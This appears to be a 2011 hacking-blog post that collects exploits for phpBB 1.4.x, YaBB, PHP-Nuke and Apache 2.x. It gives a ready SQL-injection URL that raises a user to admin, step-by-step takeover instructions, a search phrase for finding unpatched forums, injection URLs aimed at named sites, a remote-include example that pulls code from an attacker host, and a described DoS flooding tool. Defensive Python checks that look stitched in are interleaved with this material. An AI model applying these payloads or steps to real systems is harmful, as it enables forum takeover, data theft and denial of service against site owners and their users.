Friday, 25 February 2011

Vulnerability in phpBB 1.4.x allows admin privilege takeover


phpBB 1.4.x forums have a very serious bug that lets an ordinary user run a statement which updates a few fields in preferences and thereby obtain admin rights.
One of the bugs is found in the following code:
< Example sql query in prefs.php >
$sql = "UPDATE users SET
    user_viewemail = '$viewemail',
    user_theme = '$themes', user_attachsig = '$sig',
    user_desmile = '$smile', user_html = '$dishtml',
    user_bbcode = '$disbbcode', user_lang = '$lang'
    WHERE user_id = '$userdata[user_id]'";
</ End example code >
To exploit it, run the modify-preferences action in prefs.php, supplying a specific value for the viewemail variable.
The following example gives the user maxx admin rights (privilege level 4):
http://k.domaindlx.com/clairsang/sitename/phpbbfolder/prefs.php@save=1&viewemail=1',user_level_253d'4'%20where%20username_253d'maxx'_2523
This runs an SQL statement that updates viewemail and, at the same time, user_level.
So the steps to test such a forum are:
- Register an account
- Log in with the account just registered
- Open the link from the example above
- If the preferences are saved successfully (no error reported), return to the forum index and open the Administration Panel at the bottom of the forum.
Note that on some forums the Administration Panel still does not appear after the preferences are set successfully; you can try the following link: /phpBBfolder/admin/index.php (as with the pregnancy.org forum below).
You can find more unpatched phpBB 1.4.x forums on the net by searching for a phrase such as: "powered phpbb 1.4.0"

Security vulnerability in YaBB allows unauthorized remote access


YaBB is free forum software that is quite widely used today. The bug is found in version 1.50 and earlier. In the YaBB forum's Sources directory there is a file, Packages.php, whose first lines can let an attacker gain unauthorized remote access and run dangerous commands.
See the full information below:

All versions prior to 1.5.0
----------------------
Vulnerability:
----------------------
YabbSE keeps all of its function includes in a directory called "Sources" which
is not protected. Inside this directory a file called Packages.php exists. This
file is supposed to be included and not called directly, but if an attacker calls
it directly he/she may cause the script to run remote arbitrary code.
Below are a couple of the first lines in Packages.php:

********
..

global $adminplver;
$Packagesphpver="YaBB SE 1.4.1";

$safe_mode = ini_get("safe_mode");

$pacmanver = "1.4.1";

include_once("$sourcedir/Packer.php");

..

********

We can see here that the variable $sourcedir is never defined and therefore may be
defined through global injection.
Example:

http://victim/yabbse/Sources/Packages.php?...ttp://attacker/

where the attacker server has a file called Packer.php.
An attacker may execute remote code on the server with webserver permissions.

Side-note: An attacker may also use this file for XSS attack on the server.

----------------------
Solution:
----------------------

Please check the vendor's website for new patches.

As a temporary solution, create a .htaccess file that contains 'Deny from all'.
Place it in the /Sources/ directory and that should block remote users from accessing it.

----------------------
Greetz:
----------------------

Hawkje, Truckle, Cyon, daemorhedron, Mithrandir
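The advisory's temporary fix is to deny all access to /Sources/. The following added example (not part of the advisory or of YaBB) is a small access-log check a defender can run to confirm that direct requests into Sources/ are being refused and to spot ones that carry a URL in a query parameter, as in the advisory's example. The log lines, IPs and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines (not from the page). The first one mirrors the
# advisory's direct-call pattern; attacker.invalid is a placeholder host.
SAMPLE_LOG = """\
203.0.113.9 - - [25/Feb/2011:10:00:01 +0700] "GET /yabbse/Sources/Packages.php?sourcedir=http://attacker.invalid/ HTTP/1.0" 200 512
198.51.100.4 - - [25/Feb/2011:10:00:02 +0700] "GET /yabbse/index.php?board=1 HTTP/1.1" 200 8812
203.0.113.9 - - [25/Feb/2011:10:00:03 +0700] "GET /yabbse/Sources/Packer.php HTTP/1.0" 403 219
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(line):
    """Return a finding for any request into Sources/, or None for other lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if "/sources/" not in parts.path.lower():
        return None
    params = parse_qs(parts.query)
    # A query value that is itself a URL is the include-injection shape from the advisory.
    remote = any(v.lower().startswith(("http://", "https://", "ftp://"))
                 for values in params.values() for v in values)
    return {
        "ip": m["ip"],
        "path": parts.path,
        "status": int(m["status"]),
        "remote_include": remote,
        "served": m["status"] == "200",   # 200 means the .htaccess block is not in place
    }

def scan(log_text):
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```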


Hacking PHP-Nuke: SQL injection, versions 6.x (including 6.5) and 5.x


Information:
+ Type: SQL injection.
+ Software: PHP-Nuke
+ Versions: 6.x (including 6.5) and 5.x
+ Exploit: Yes

Introduction:
PhpNuke is a well-known management system written in PHP by Francisco Burzi.

Description:
The Web_Links module in PHP-Nuke has many SQL injection bugs (more than 20). A user can inject SQL into almost any numeric value that is included in a query, because the author did not use quotes.
Exploitation:
If the SQL engine allows a UNION statement (as MySQL 4 does), it can pull information out of any database table, which of course includes passwords, personal data, etc. Otherwise, without UNION one cannot reach SQL tables other than those managed by web links, so the only option is to play with hits and votes.
Example:
In the viewlink function:
$result = sql_query("select title,parentid from ".$prefix."_links_categories where cid=$cid", $dbi);
+http://victim/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=2%20<your code>
A few more SQL injection bugs
Example:
In the getit function:
sql_query("update ".$prefix."_downloads_downloads set hits=hits+1 WHERE lid=$lid", $dbi);
$result = sql_query("SELECT url FROM ".$prefix."_downloads_downloads WHERE lid=$lid", $dbi);
+http://www.caxa.ru/modules.php?name=Downloads&d_op=getit&lid=2%20<our_code>

In the search function:
$result = sql_query("SELECT lid, cid, title, url, description, date, hits,
    downloadratingsummary, totalvotes, totalcomments, filesize, version, homepage
    FROM ".$prefix."_downloads_downloads WHERE title LIKE '%$query%' OR
    description LIKE '%$query%' ORDER BY $orderby LIMIT $min,$downloadsresults", $dbi);
+http://www.caxa.ru/modules.php?name=Downloads&d_op=search&min=2%20<our_code>
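Both the phpBB prefs.php query above and the PHP-Nuke queries here share one defect: a request value is spliced into the SQL text, either inside quotes (viewemail) or as a bare number (cid, lid, min). The added example below (written here for illustration, not code from either project) puts the vulnerable string-building beside a hardened version that validates the value and binds it as a parameter, using sqlite3 so it runs offline. The tables are constructed stand-ins with trimmed columns.

```python
import sqlite3

# Constructed stand-ins for phpBB's users table and PHP-Nuke's downloads table
# (column sets trimmed; the table names here are assumptions, not the real schemas).
SCHEMA = """
CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT,
                    user_viewemail INTEGER, user_level INTEGER);
INSERT INTO users VALUES (7, 'maxx', 0, 1);
CREATE TABLE nuke_downloads_downloads (lid INTEGER PRIMARY KEY, hits INTEGER);
INSERT INTO nuke_downloads_downloads VALUES (2, 0);
"""

def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

# The defect both advisories describe: request values become part of the SQL text,
# so a quote (prefs.php) or a bare number (getit) can carry extra SQL along.
def vulnerable_prefs_sql(user_id, viewemail):
    return f"UPDATE users SET user_viewemail='{viewemail}' WHERE user_id='{user_id}'"

def vulnerable_getit_sql(lid):
    return f"UPDATE nuke_downloads_downloads SET hits=hits+1 WHERE lid={lid}"

def as_int(value, allowed=None):
    """Accept only a plain decimal string, optionally restricted to a whitelist."""
    if not isinstance(value, str) or not value.isdigit():
        raise ValueError(f"rejected non-numeric value {value!r}")
    n = int(value)
    if allowed is not None and n not in allowed:
        raise ValueError(f"rejected out-of-range value {n}")
    return n

def safe_update_prefs(conn, user_id, viewemail):
    # Validate first, then bind: the value can never become part of the statement.
    flag = as_int(viewemail, allowed={0, 1})
    conn.execute("UPDATE users SET user_viewemail=? WHERE user_id=?", (flag, user_id))
    return flag

def safe_count_hit(conn, lid):
    n = as_int(lid)
    conn.execute("UPDATE nuke_downloads_downloads SET hits=hits+1 WHERE lid=?", (n,))
    return conn.execute("SELECT hits FROM nuke_downloads_downloads WHERE lid=?", (n,)).fetchone()[0]
```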

Changing the admin password with VB


Try studying and completing this function!
Public Function ChangePassword(UserName As String, NewPassword As String) As Boolean
    'EXAMPLE: ChangePassword "Administrator", "adminpassword"

    Dim conn As New ADODB.Connection
    Dim rs As ADODB.Recordset
    Dim oRoot As IADs
    Dim oDomain As IADs
    Dim sBase As String
    Dim sFilter As String
    Dim sDomain As String
    Dim sAttribs As String
    Dim sDepth As String
    Dim sQuery As String
    Dim user As IADsUser

    On Error GoTo errhandler
    'work in the default domain
    Set oRoot = GetObject("LDAP://rootDSE")
    sDomain = oRoot.Get("defaultNamingContext")
    Set oDomain = GetObject("LDAP://" & sDomain)
    sBase = "<" & oDomain.ADsPath & ">"
    'Only get the user name requested
    sFilter = "(&(objectCategory=person)(objectClass=user)(name=" _
        & UserName & "))"
    sAttribs = "adsPath"
    sDepth = "subTree"
    'ADSI search string: <base>;filter;attributes;scope
    sQuery = sBase & ";" & sFilter & ";" & sAttribs & ";" & sDepth
    conn.Open _
        "Data Source=Active Directory Provider;Provider=ADsDSOObject"
    Set rs = conn.Execute(sQuery)
    With rs
        If Not .EOF Then
            'Bind to the matching user object and set the new password
            Set user = GetObject(rs("adsPath"))
            user.SetPassword NewPassword
            ChangePassword = True
        End If
    End With

errhandler:
    'Clean-up runs on both the success and the error path
    On Error Resume Next
    If Not rs Is Nothing Then
        If rs.State <> 0 Then rs.Close
        Set rs = Nothing
    End If
    If Not conn Is Nothing Then
        If conn.State <> 0 Then conn.Close
        Set conn = Nothing
    End If
    Set oRoot = Nothing
    Set oDomain = Nothing
End Function


Exploit Code Released for Apache 2.x Memory Leak


>II. DESCRIPTION
>
>Remote exploitation of a memory leak in the Apache HTTP Server causes the
>daemon to over utilize system resources on an affected system. The problem
>is HTTP Server's handling of large chunks of consecutive linefeed
>characters. The web server allocates an eighty-byte buffer for each
>linefeed character without specifying an upper limit for allocation.
>Consequently, an attacker can remotely exhaust system resources by
>generating many requests containing these characters.


This is partially correct. Rather than "many requests containing these characters", the more effective strategy is "many instances of this character (these characters)".

>III. ANALYSIS
>
>While this type of attack is most effective in an intranet setting, remote
>exploitation over the Internet, while bandwidth intensive, is feasible.
>Remote exploitation could consume system resources on a targeted system
>and, in turn, render the Apache HTTP daemon unavailable.


Isn't that the truth? In a few minutes, my Apache used some 390 MB of memory when tested. The statement that only 80 bytes is lost per newline understates the issue in my opinion. If we multiply:


2 newlines: 160 bytes
4 newlines: 320 bytes
8 newlines: 640 bytes
16 newlines: 1280 bytes
32 newlines: 2560 bytes
64 newlines: 5120 bytes
128 newlines: 10240 bytes
256 newlines: 20480 bytes
512 newlines: 40960 bytes
1024 newlines: 81920 bytes


Worse, Apache doesn't require any form to the request whatsoever, so 1 KB of 0x0A's is just as good as a well-formed request. Let's continue:


2 KB: 163840 bytes
4 KB: 655360 bytes
8 KB: 1310720 bytes
16 KB: 2621440 bytes


That's nearly 2 MB leaked in response to 16 KB. And, this is just baseline figures of the actual leak itself, and doesn't take into account various other factors, including:


* Other use of memory by Apache
* The resources associated with the web session


>iDEFENSE has performed research using proof of concept exploit code to
>demonstrate the impact of this vulnerability.


I'm not seeing any example code, so let's try the attached.
"apache-massacre.c" allows the user to target a host/port of choice. It uses a single-connection method, and is stopped with a simple CTRL+C interrupt.


It sends the data (which is patterns of "\r\n") in "chunks". It sends a pre-specified number of character sequences, and then checks the interrupt flag for a request to terminate. Deployed on a high-bandwidth connection (or a low-bandwidth connection with a lot of time to spare), Apache is disabled within seconds.


The attached code compiles cleanly on Win32, and *should* compile on any system that is POSIX-compliant, and offers a BSD socket interface.


>A successful exploitation scenario requires between two and
>seven megabytes of traffic exchange.


I hate to say, but I wonder where these figures come from. Obviously, a machine with a 16 MB RAM and a 512 MB hard drive is going to run out of resources incredibly faster than a machine with 512 MB RAM and a 100 GB hard drive is. Also, "between two and seven megabytes of traffic exchange" is very possible with a DDoSnet of some kind. With 10 connections at 1 mbps each (for a combined speed of 10 mbps), approximately 1,750,000 bytes (1.25 MB) is exchanged each second. This same speed is reached by the full upload rates of many LAN-based providers (schools, for instance). Further, a single cable modem has a link rate of 10 mbps, held down only by ISP capping.


In the situation of such a network (or, a single uncapped cable modem), the entire traffic exchange rate is hit within one second.
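The condition the advisory and the reply describe is a request preceded by a long run of bare linefeeds or CRLF pairs. The added example below (not from the advisory or the attached tool) is a check a front-end proxy or a packet-inspection script could apply to raw request bytes: it counts the leading linefeeds, estimates the allocation at the eighty bytes per linefeed the advisory states, and flags the request once a small allowance for harmless leading blank lines is exceeded. The threshold and function names are assumptions.

```python
LEAK_PER_LINEFEED = 80   # figure quoted from the advisory above

def leading_linefeeds(data: bytes) -> int:
    """Count the bare LF or CRLF sequences that precede the first request line."""
    i = count = 0
    while i < len(data):
        if data[i:i + 2] == b"\r\n":
            i += 2
        elif data[i:i + 1] == b"\n":
            i += 1
        else:
            break
        count += 1
    return count

def assess(data: bytes, max_blank_lines: int = 8) -> dict:
    """Estimate the server-side allocation and decide whether to refuse the request.

    max_blank_lines is an assumed allowance: a handful of leading blank lines is
    legitimate (RFC 2616 tells servers to ignore them), a flood is not.
    """
    n = leading_linefeeds(data)
    return {
        "linefeeds": n,
        "estimated_leak_bytes": n * LEAK_PER_LINEFEED,
        "reject": n > max_blank_lines,
    }

if __name__ == "__main__":
    # Constructed inputs: a normal request, and 2 KB of 0x0A ahead of one.
    print(assess(b"\r\nGET / HTTP/1.0\r\n\r\n"))
    print(assess(b"\n" * 2048 + b"GET / HTTP/1.0\r\n\r\n"))
```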